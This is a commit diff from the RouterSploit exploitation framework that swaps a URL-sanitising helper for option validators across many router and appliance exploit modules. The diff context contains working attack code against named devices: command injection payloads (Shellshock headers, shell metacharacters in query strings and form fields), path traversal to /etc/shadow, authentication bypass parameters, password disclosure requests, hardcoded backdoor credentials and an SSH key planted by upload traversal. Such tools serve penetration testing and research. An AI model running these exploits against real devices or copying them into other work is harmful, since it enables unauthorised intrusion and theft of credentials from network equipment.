Skip to content

R
routersploit
Commit 79e72d9d by Marcin Bury
Options

Implementing validators for exploits.

parent bd731f2d
Showing with 109 additions and 109 deletions
routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
......@@ -2,13 +2,13 @@ import re
from routersploit import (
exploits,
sanitize_url,
print_status,
print_error,
print_success,
print_table,
http_request,
mute,
validators,
)
......@@ -32,14 +32,12 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
creds = []
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
# print_status("Requesting for {}".format(url))
url = "{}:{}/password.cgi".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......@@ -65,7 +63,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
url = "{}:{}/password.cgi".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/asus/rt_n16_password_disclosure.py
......@@ -2,12 +2,12 @@ import re
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
http_request,
mute,
validators,
)
......@@ -36,11 +36,11 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(8080, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
url = "{}:{}/error_page.htm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......@@ -58,7 +58,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
url = "{}:{}/error_page.htm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/belkin/g_n150_password_disclosure.py
......@@ -2,12 +2,12 @@ import re
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
http_request,
mute,
validators,
)
......@@ -34,11 +34,11 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
url = sanitize_url("{}:{}/login.stm".format(self.target, self.port))
url = "{}:{}/login.stm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......@@ -57,7 +57,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
url = sanitize_url("{}:{}/login.stm".format(self.target, self.port))
url = "{}:{}/login.stm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/belkin/g_plus_info_disclosure.py
......@@ -2,12 +2,12 @@ import re
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_error,
print_table,
http_request,
mute,
validators,
)
......@@ -32,11 +32,11 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port))
url = "{}:{}/SaveCfgFile.cgi".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......@@ -70,7 +70,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port))
url = "{}:{}/SaveCfgFile.cgi".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/belkin/n150_path_traversal.py
......@@ -2,9 +2,9 @@ from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -33,26 +33,29 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
filename = exploits.Option('/etc/shadow', 'File to read')
def run(self):
url = sanitize_url("{}:{}/cgi-bin/webproc?getpage={}&var:page=deviceinfo".format(self.target, self.port, self.filename))
if self.check():
url = "{}:{}/cgi-bin/webproc?getpage={}&var:page=deviceinfo".format(self.target, self.port, self.filename)
response = http_request(method="GET", url=url)
if response is None:
return
response = http_request(method="GET", url=url)
if response is None:
return
if len(response.text):
print_success("Success! File: %s" % self.filename)
print response.text
if response.status_code == 200 and len(response.text):
print_success("Success! File: %s" % self.filename)
print response.text
else:
print_error("Exploit failed")
else:
print_error("Exploit failed")
print_error("Device seems to be not vulnerable")
@mute
def check(self):
url = sanitize_url("{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo".format(self.target, self.port))
url = "{}:{}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/belkin/n750_rce.py
......@@ -4,9 +4,9 @@ from routersploit import (
print_status,
print_error,
random_text,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -32,7 +32,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
......@@ -53,7 +53,7 @@ class Exploit(exploits.Exploit):
print self.execute(cmd)
def execute(self, cmd):
url = sanitize_url("{}:{}/login.cgi.php".format(self.target, self.port))
url = "{}:{}/login.cgi.php".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd)
......
routersploit/modules/exploits/cisco/ucs_manager_rce.py
......@@ -6,9 +6,9 @@ from routersploit import (
print_status,
print_error,
random_text,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -33,7 +33,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
......@@ -55,7 +55,7 @@ class Exploit(exploits.Exploit):
def execute(self, cmd):
mark = random_text(32)
url = sanitize_url("{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port))
url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port)
headers = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark)
}
......
routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
......@@ -7,9 +7,9 @@ from routersploit import (
print_error,
print_success,
print_table,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -32,12 +32,12 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
url = "{}:{}/password.cgi".format(self.target, self.port)
print_status("Requesting for {}".format(url))
response = http_request(method="GET", url=url)
......@@ -67,7 +67,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
url = "{}:{}/password.cgi".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py
......@@ -2,9 +2,9 @@ from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -31,7 +31,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
......@@ -47,7 +47,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
# check if it is valid target
url = sanitize_url("{}:{}/bsc_lan.php".format(self.target, self.port))
url = "{}:{}/bsc_lan.php".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......@@ -57,7 +57,7 @@ class Exploit(exploits.Exploit):
return False # target is not vulnerable
# checking if authentication can be baypassed
url = sanitize_url("{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port))
url = "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/dlink/dir_300_600_615_info_disclosure.py
......@@ -5,9 +5,9 @@ from routersploit import (
print_error,
print_success,
print_table,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -33,11 +33,11 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))
url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......@@ -55,7 +55,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))
url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/dlink/dir_300_600_rce.py
......@@ -4,9 +4,9 @@ from routersploit import (
print_success,
print_status,
random_text,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -33,7 +33,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
......@@ -54,7 +54,7 @@ class Exploit(exploits.Exploit):
print self.execute(cmd)
def execute(self, cmd):
url = sanitize_url("{}:{}/command.php".format(self.target, self.port))
url = "{}:{}/command.php".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = "cmd={}".format(cmd)
......
routersploit/modules/exploits/dlink/dir_645_password_disclosure.py
......@@ -5,9 +5,9 @@ from routersploit import (
print_error,
print_success,
print_table,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -31,12 +31,12 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(8080, 'Target port') # default port
def run(self):
# address and parameters
url = sanitize_url("{}:{}/getcfg.php".format(self.target, self.port))
url = "{}:{}/getcfg.php".format(self.target, self.port)
data = {"SERVICES": "DEVICE.ACCOUNT"}
# connection
......@@ -60,7 +60,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
# address and parameters
url = sanitize_url("{}:{}/getcfg.php".format(self.target, self.port))
url = "{}:{}/getcfg.php".format(self.target, self.port)
data = {"SERVICES": "DEVICE.ACCOUNT"}
response = http_request(method="POST", url=url, data=data)
......
routersploit/modules/exploits/dlink/dns_320l_327l_rce.py
......@@ -7,9 +7,9 @@ from routersploit import (
print_status,
print_error,
random_text,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -34,7 +34,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
......@@ -56,7 +56,7 @@ class Exploit(exploits.Exploit):
def execute(self, cmd):
mark = random_text(32)
url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark))
url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark)
response = http_request(method="GET", url=url)
if response is None:
......@@ -77,7 +77,7 @@ class Exploit(exploits.Exploit):
solution = number - 1
cmd = "echo $(({}-1))".format(number)
url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd))
url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/dlink/dsl_2750b_info_disclosure.py
......@@ -5,9 +5,9 @@ from routersploit import (
print_success,
print_error,
print_table,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -33,11 +33,11 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
url = "{}:{}/hidden_info.html".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......@@ -62,7 +62,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
url = "{}:{}/hidden_info.html".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py
......@@ -3,9 +3,9 @@ from routersploit import (
print_success,
print_error,
print_status,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -36,7 +36,7 @@ class Exploit(exploits.Exploit):
def run(self):
# address and parameters
url = sanitize_url("{}:{}/cgi-bin/webproc".format(self.target, self.port))
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../..{}".format(self.filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
# connection
......@@ -54,7 +54,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
# address and parameters
url = sanitize_url("{}:{}/cgi-bin/webproc".format(self.target, self.port))
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
# connection
......
routersploit/modules/exploits/dlink/dwr_932_info_disclosure.py
......@@ -6,9 +6,9 @@ from routersploit import (
print_error,
print_table,
print_status,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -32,11 +32,11 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
url = "{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......@@ -62,7 +62,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
url = "{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/linksys/1500_2500_rce.py
......@@ -6,9 +6,9 @@ from routersploit import (
print_status,
print_error,
random_text,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -32,7 +32,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
username = exploits.Option('admin', 'Username to login with')
password = exploits.Option('admin', 'Password to login with')
......@@ -56,7 +56,7 @@ class Exploit(exploits.Exploit):
print self.execute(cmd)
def execute(self, cmd):
url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
url = "{}:{}/apply.cgi".format(self.target, self.port)
data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1"}
response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
......@@ -66,7 +66,7 @@ class Exploit(exploits.Exploit):
def check(self):
mark = random_text(32)
cmd = "echo {}".format(mark)
url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
url = "{}:{}/apply.cgi".format(self.target, self.port)
data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
......
routersploit/modules/exploits/linksys/wap54gv3_rce.py
......@@ -5,10 +5,10 @@ from routersploit import (
print_success,
print_error,
print_status,
sanitize_url,
random_text,
http_request,
mute,
validators,
)
......@@ -32,7 +32,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
......@@ -53,7 +53,7 @@ class Exploit(exploits.Exploit):
print self.execute(cmd)
def execute(self, cmd):
url = sanitize_url("{}:{}/debug.cgi".format(self.target, self.port))
url = "{}:{}/debug.cgi".format(self.target, self.port)
data = {"data1": cmd, "command": "ui_debug"}
response = http_request(method="POST", url=url, data=data, auth=("Gemtek", "gemtekswd"))
......
routersploit/modules/exploits/multi/misfortune_cookie.py
......@@ -4,9 +4,9 @@ from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -136,7 +136,7 @@ class Exploit(exploits.Exploit):
return
number = devices[int(self.device)]['number']
offset = devices[int(self.device)]['offset']
url = sanitize_url("{}:{}".format(self.target, self.port))
url = "{}:{}".format(self.target, self.port)
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
......@@ -156,7 +156,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
url = sanitize_url("{}:{}/test".format(self.target, self.port))
url = "{}:{}/test".format(self.target, self.port)
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
......@@ -182,4 +182,4 @@ class Exploit(exploits.Exploit):
else:
return None # could not verify
return False # target is not vulnerable
\ No newline at end of file
return False # target is not vulnerable
routersploit/modules/exploits/multi/shellshock.py
......@@ -3,7 +3,6 @@ import string
from routersploit import (
exploits,
sanitize_url,
print_status,
print_error,
print_success,
......@@ -11,6 +10,7 @@ from routersploit import (
random_text,
http_request,
mute,
validators,
)
......@@ -35,7 +35,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
path = exploits.Option('/', 'Url path')
......@@ -68,7 +68,7 @@ class Exploit(exploits.Exploit):
def execute(self, cmd):
marker = random_text(32)
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
url = "{}:{}{}".format(self.target, self.port, self.path)
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
......@@ -94,7 +94,7 @@ class Exploit(exploits.Exploit):
cmd = "echo $(({}-1))".format(number)
marker = random_text(32)
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
url = "{}:{}{}".format(self.target, self.port, self.path)
for payload in self.payloads:
injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
......
routersploit/modules/exploits/netgear/multi_rce.py
......@@ -5,9 +5,9 @@ from routersploit import (
print_info,
print_error,
random_text,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -45,7 +45,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
resources = ['boardData102.php', 'boardData103.php', 'boardDataNA.php', 'boardDataWW.php', 'boardDataJP.php']
......@@ -70,8 +70,8 @@ class Exploit(exploits.Exploit):
print_info(self.execute(cmd))
def execute(self, cmd):
url = sanitize_url("{}:{}/{}?writeData=true&reginfo=0&macAddress= "
"001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd))
url = ("{}:{}/{}?writeData=true&reginfo=0&macAddress= "
"001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd))
# blind command injection
response = http_request(method="GET", url=url)
......@@ -83,8 +83,8 @@ class Exploit(exploits.Exploit):
cmd = "echo {}".format(mark)
for resource in self.resources:
url = sanitize_url("{}:{}/{}?writeData=true&reginfo=0&macAddress= "
"001122334455 -c 0 ;{}; echo #".format(self.target, self.port, resource, cmd))
url = ("{}:{}/{}?writeData=true&reginfo=0&macAddress= "
"001122334455 -c 0 ;{}; echo #".format(self.target, self.port, resource, cmd))
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/netgear/n300_auth_bypass.py
......@@ -2,9 +2,9 @@ from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -37,20 +37,20 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
print_success("Target is vulnerable")
url = sanitize_url("{}:{}".format(self.target, self.port))
url = "{}:{}".format(self.target, self.port)
print "Visit: {}/\n".format(url)
else:
print_error("Target seems to be not vulnerable")
@mute
def check(self):
url = sanitize_url("{}:{}/".format(self.target, self.port))
url = "{}:{}/".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......@@ -58,14 +58,14 @@ class Exploit(exploits.Exploit):
# unauthorized
if response.status_code == 401:
url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port))
url = "{}:{}/BRS_netgear_success.html".format(self.target, self.port)
for _ in range(0, 3):
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
url = sanitize_url("{}:{}/".format(self.target, self.port))
url = "{}:{}/".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......
routersploit/modules/exploits/netgear/prosafe_rce.py
......@@ -6,9 +6,9 @@ from routersploit import (
print_status,
print_error,
random_text,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -35,7 +35,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
......@@ -57,7 +57,7 @@ class Exploit(exploits.Exploit):
def execute(self, cmd):
mark = random_text(32)
url = sanitize_url("{}:{}/login_handler.php".format(self.target, self.port))
url = "{}:{}/login_handler.php".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark)
......
routersploit/modules/exploits/technicolor/tc7200_password_disclosure.py
......@@ -2,9 +2,9 @@ from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -28,11 +28,11 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
url = sanitize_url("{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port))
url = "{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......@@ -46,7 +46,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
url = sanitize_url("{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port))
url = "{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
......
routersploit/modules/exploits/ubiquiti/airos_6_x.py
......@@ -13,9 +13,9 @@ from routersploit import (
print_success,
print_error,
random_text,
sanitize_url,
http_request,
mute,
validators,
)
......@@ -42,7 +42,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. https://192.168.1.1') # Target address
target = exploits.Option('', 'Target address e.g. https://192.168.1.1', validators=validators.url) # Target address
port = exploits.Option(443, 'Target port e.g. 443') # Default port
def run(self):
......@@ -61,7 +61,7 @@ class Exploit(exploits.Exploit):
upload_params = {'file': ('../../etc/dropbear/authorized_keys', tmp_file_pubkey, {'Expect': ''})}
upload_url = sanitize_url('{0}:{1}/login.cgi' .format(self.target, self.port))
upload_url = '{0}:{1}/login.cgi' .format(self.target, self.port)
response = http_request(url=upload_url, method='POST', files=upload_params)
if response is None:
......@@ -123,7 +123,7 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
base_url = sanitize_url('{}:{}/' .format(self.target, self.port))
base_url = '{}:{}/' .format(self.target, self.port)
upload_url = base_url + 'login.cgi'
response = http_request(url=upload_url, method='GET')
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment